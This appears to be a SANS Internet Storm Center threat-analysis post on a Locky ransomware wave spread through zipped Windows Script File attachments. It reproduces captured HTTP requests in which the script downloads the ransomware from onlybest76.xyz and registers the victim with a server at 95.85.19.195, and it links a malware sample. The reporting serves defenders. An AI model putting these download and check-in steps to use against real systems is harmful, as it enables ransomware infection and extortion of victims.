Pretty much all the Locky variants I have looked at the last couple days arrived as zipped JavaScript files. Today, I got something slightly different. While the e-mail looked the same overall, the file was a zipped Windows Script File (.wsf). Overall, this isnt all that different. Windows Script is essentially JavaScript. The only difference is the
Todays subject for the e-mail was Transaction details. Once the user runs the script by double-clicking the file, it will download the actual crypto ransomware.
GET /2tn0o HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflate .NET CLR 3.5.30729)Host: onlybest76.xyzConnection: Keep-Alive
Just like earlier versions, it then registers the infected system with a website that is only identified by its IP address, so you will not see a DNS lookup for it:
POST /data/info.php HTTP/1.1Accept: */*Accept-Language: en-usReferer: http://95.85.19.195/data/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cache .NET CLR 3.5.30729)Host: 95.85.19.195Content-Length: 942Connection: Keep-Alive
[post data omitted]
Anti-Malware proves its usual value by doing probably slightly better than a blind chicken in protecting you from this malware. You can download a file with packet capture, mail server logs, and the malware sample here (password: blind chicken ).
Between 9am and 1:30pm UTC, I received 1425 e-mails that match this pattern.
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.